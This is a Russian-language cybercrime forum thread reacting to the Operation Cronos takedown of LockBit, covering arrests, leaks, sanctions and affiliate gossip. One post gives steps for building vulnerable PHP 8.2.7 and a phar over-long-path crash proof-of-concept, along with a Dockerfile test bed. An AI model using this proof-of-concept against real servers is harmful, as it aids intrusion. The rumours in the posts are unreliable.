• XSS.stack #1 – первый литературный журнал от юзеров форума

LockBit ransomware: операция Cronos

Отслеживать
Пожалуйста, обратите внимание, что пользователь заблокирован
c0d3x сказал(а):
Ориентировки в аэропорту: флэшка на шее, на красной веревочке.
И тарелка старлинка на голове как шляпа у Кунг Лао.
 
Локбит можешь вылетать в РФ
MaFio сказал(а):
При этом эти боеприпасы применяются автоматически.

Вот как это описывает Эдвард Сноуден в своей книге:
Сказки

Локбит не хочешь гнить в тюрьме в США вступай к нам в Шторм Z искупишь кровью свои проделки
 
bratva сказал(а):
Басстеру
возможно его начали активно искать после его публичного шума как и локбита решили уебать именно щас
про продафт басстерлорд давно еще писал в твиттере и активно заявлял что он их выебет, ну посмотрим )
но продафт очень серьезная орга и у них методы тоже грязные все вот это вот ломать, тока под крышей госва
басстерлорд прикольный челик был, тоже красивые посты писал до вот этой х#йни с его мануалом по бруту впнов
 
c0d3x сказал(а):
Ебало даунов представили которые реально тату с его ником набивали?
Ребрендинг можно вывести из человека, а человека с ребрендинга никак😂
 
Пожалуйста, обратите внимание, что пользователь заблокирован
bratva сказал(а):
Что есть на данный момент:
1) Три пресс-релиза - от американцев, англичан и Европола: по сути - реализовали декриптор на основе слитых ключей (при содействии японской полиции), обещают разлочить все, утверждают, что поимели всю инфраструктуру (насчитали аж 34 сервера) - минимум (из моего понимания) - панель аффилэйтов, блог и чаты, наморозили денег (судя по всему - речь о биржевых акках - цифра более 200 акков), произвели два ареста (украинец в Польше и украинец в Виннице).
2) В доказательство как глубоко ушли по инфре - опубликовали внутренние скриншоты панельки (http://lockbitapt2d73krlbewgv27tquljgxr33xbwwsp6rkyieto7u4ncead.onion/posts/lockbit-leaks.php), есть сорсы бэкенда.
3) Жестко прошлись по Басстеру и его партнеру (судя по всему - привет от Prodaft), раскрыли доки обвинительных актов на них (https://storage.courtlistener.com/recap/gov.uscourts.cand.395683/gov.uscourts.cand.395683.1.0.pdf), добавили в список санкций, заявили, что инфа о Басстере (его деанон) известна с 2022, меня убило наличие гмейлов у обоих товарищей: https://ofac.treasury.gov/recent-actions/20240220
Я обратил внимание в индайтменте на Басстера эпизод, где был сделан акцент, что он получил выкуп от жертвы на Монеро, возможно я мнительный, но в увязке с эпизодом по финну Кивимяки допускаю, что появились технологии эффективно трекать монеро (возможно при ошибках и увязке с биржами).
4) Декриптор залили сюда уже: https://www.nomoreransom.org/en/decryption-tools.html
5) Неприятно было видеть скрины бана акков ЛБ на ХСС и Эксплойте - я уверяю, что это совпадение, но ситуацией воспользовались (чего я боялся) и теперь видимо пытаются посеять смуту.

Чего обещали:
- деанон ЛокбитСаппа (через два дня);
- информацию на группу аффов (возможны новые деаноны и санкции);
- информацию по StealBit (внутренняя тулза для эксфильтрации данных);
- отчет Продафта (без деталей, подозреваю будет разжевано все по Басстеру) и Трендмикро (по новому энкриптору ЛБ);
- финансовый стриптиз по операциям ЛБ.

Вроде важного ничего не пропустил.

Предлагаю всем запастись поп-корном, будет дохуя еще веселого в паблике. Аффам советую предпринимать меры безопасности уже сейчас.

Еще одна важная вещь: партнеры теперь обвиняют Lockbit.

один партнер в Твиттере делится всем дерьмом, через которое они проходят из-за них

есть скриншоты чатов Tox
 

Вложения

  • Twitter_Loxbit.PNG
    Twitter_Loxbit.PNG
    40.6 КБ · Просмотры: 705
  • Twitter_Loxbit_Tox1.PNG
    Twitter_Loxbit_Tox1.PNG
    56.8 КБ · Просмотры: 713
  • Twitter_Loxbit_Tox2.PNG
    Twitter_Loxbit_Tox2.PNG
    84.2 КБ · Просмотры: 717
c0d3x сказал(а):
Ебало даунов представили которые реально тату с его ником набивали?
1708456238074.png
 
#LockBit, You have until 15 August to pay $10 million for my research conducted to infiltrate and identify the secrets you have been hiding. ALL AVAILABLE DATA WILL BE PUBLISHED! (in the #Ransomware Diaries Vol 3 -LockBit's Secrets!) Its time to pay!
#LockBit, У вас есть время до 15 августа, чтобы заплатить 10 миллионов долларов за мое исследование, проведенное с целью проникновения и выявления секретов, которые вы скрывали. ВСЕ ИМЕЮЩИЕСЯ ДАННЫЕ БУДУТ ОПУБЛИКОВАНЫ! (в #Ransomware Diaries Vol 3 -LockBit's Secrets!) Пришло время платить!

Кто-то еще сомневается что Лб балабол? Или может уже начнете слишать меня?
 
grozdniyandy сказал(а):
Они наверное хотят начать хаос внутри блечеров, что и выходит на данный момент. Ведь от части некоторые потеряли доверие к своим же.В целом он сам виноват, не было бы кидалки, я уверен что его бы поддерживали как минимум люди с которыми он работал/ет.

Ты написал это сейчас, они напишут это через 2 дня

Не удивлюсь если php их рук дело, у них сильные вебщики. Кому интересно, стенд можно поставить так:
Код: 
# удаляем старые вещи связанные с пхп
sudo apt-get purge php* libapache2-mod-php*
sudo apt-get autoremove
# устанавливаем уязвимую версию пхп
sudo apt-get update
sudo apt-get install -y build-essential libxml2-dev libsqlite3-dev pkg-config libcurl4-openssl-dev libssl-dev libonig-dev libzip-dev libpng-dev libjpeg-dev libwebp-dev libfreetype6-dev
wget https://www.php.net/distributions/php-8.2.7.tar.gz
tar -xf php-8.2.7.tar.gz
apt  install valgrind
./configure --enable-debug --disable-all --enable-phar --with-valgrind
echo 'export PATH="/usr/local/php/bin:$PATH"' >> ~/.bashrc
source ~/.bashrc
php -v
Создаём файл 1.php с таким контентом:
Код: 
<?php
$phar = new Phar('myarchive.phar');
$phar->startBuffering();
$phar->addFromString(str_repeat('A', PHP_MAXPATHLEN - 1).'B', 'This is the content of the file.');
$phar->stopBuffering();
?>
Код: 
php -d phar.readonly=0 1.php
Создаём файл trigger.php с таким контентом:
Код: 
<?php
$handle = opendir("phar://./myarchive.phar");
$x = readdir($handle);
closedir($handle);

var_dump($x);
?>
Код: 
php -v trigger.php
Писать что-то на эту тему знаний нет, макс стенд подниму, если есть эксперты пхп, баффер оверфлоу и рце - добро пожаловать
Как они phar залили им?
 
Vinki сказал(а):
Посмотреть вложение 77598
тут таких много) даже очень
Да и ещё просили своих друзей и подруг набивать. Был кто-то уже не помню. Это отдельный вид "гениев".
Угарно будет если в Европе или в США и за такое набутылят, хотя кто обычно такое делает, либо живёт на пособие в Гейропе или США, или в СНГ побирается к сожалению по их же вине, а винят президента, каждую собаку, шкуру, или ещё кого в своей же безнадёжности ебу*ей..)
 
Код: 
# Use an official PHP runtime as a parent image with Apache
FROM php:8.0.0-apache-buster

# Install Valgrind for debugging (optional, based on your use case)
RUN apt-get update && apt-get install -y valgrind
# Install any needed packages and PHP extensions
RUN docker-php-ext-install pdo pdo_mysql
# Enable Apache mod_rewrite
RUN a2enmod rewrite
# Copy the application files to the container
COPY src/ /var/www/html/
# Create and set permissions for the uploads directory
RUN mkdir /var/www/html/uploads && chown www-data:www-data /var/www/html/uploads

# Expose port 80 to allow communication to/from server
EXPOSE 80

Понятие не имею в чем эксплоит. На гитхабе чел просто компилированный файл через valgrind проводит. Если можно подгружать фаилы и их потом вызивать, в чем ссысл именно этого цве я понят не могу.
 
grupenfurer сказал(а):
админ, разбань локбита, пусть зайдет прояснит ситуевину
А что то разве осталось в тенях?)

Пришли ребята, вынесли инфру лб, спалили все чаты/софт, вышли на бастера. Вполне вероятно, что через 2 дня нас ждет деанон великого скупщика доступов у михона))

бтв - если судить по логике, то 10кк он должен отдать своему верстальщику, который был отвественнен за сайт и ту самую пыху xD
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх